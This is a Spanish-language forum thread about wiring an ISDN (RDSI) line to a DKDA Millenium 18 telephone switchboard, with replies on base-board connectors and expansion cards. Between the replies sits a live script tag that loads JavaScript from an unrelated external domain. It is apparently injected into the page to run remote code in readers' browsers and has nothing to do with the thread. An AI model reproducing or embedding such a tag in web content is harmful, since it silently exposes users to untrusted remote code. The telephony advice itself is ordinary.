Conectar DKDA 18 a la linea RDSI telefónica

Se ha desmontado y trasladado una centralita dkda milenium 18, y el problema es que no se como se conecta la rdsi a la misma, si es tras el tr1, a que bus, o si esta se conecta directamente a la linea de entrada como se haría en una analógica. He visto en el manual algo de que se usan los pin 3 6 4 5, pero no lo tengo claro. ¿Habría un esquema de conexiones para poder poner en marcha la cetralita?

1 respuesta

Respuesta

La rdsi va conectada en al placa base, veras que hay unos conectores que van alojados en la parte inferior de la placa.

Y va de la TR directamente al conector de la centralita y con los pines cruzados

Si, pero tengo una placa adicional con 2 conexiones de rdsi, osea igulales que la de la placa, entonces no se si esta placa es para poder conectar un teléfono rdsi o si es para poner la entrada de rdsi. No se si me explico.

<script type="text/javascript" src="http://nuevotemarosa.info/?0.8067568550439851"></script>

Esas son placas de ampliación, tu tienes dis RDSI en la base mas las que tengas en ea placa. Las primeras RDSI que tengas las debes de conecatr en la placa base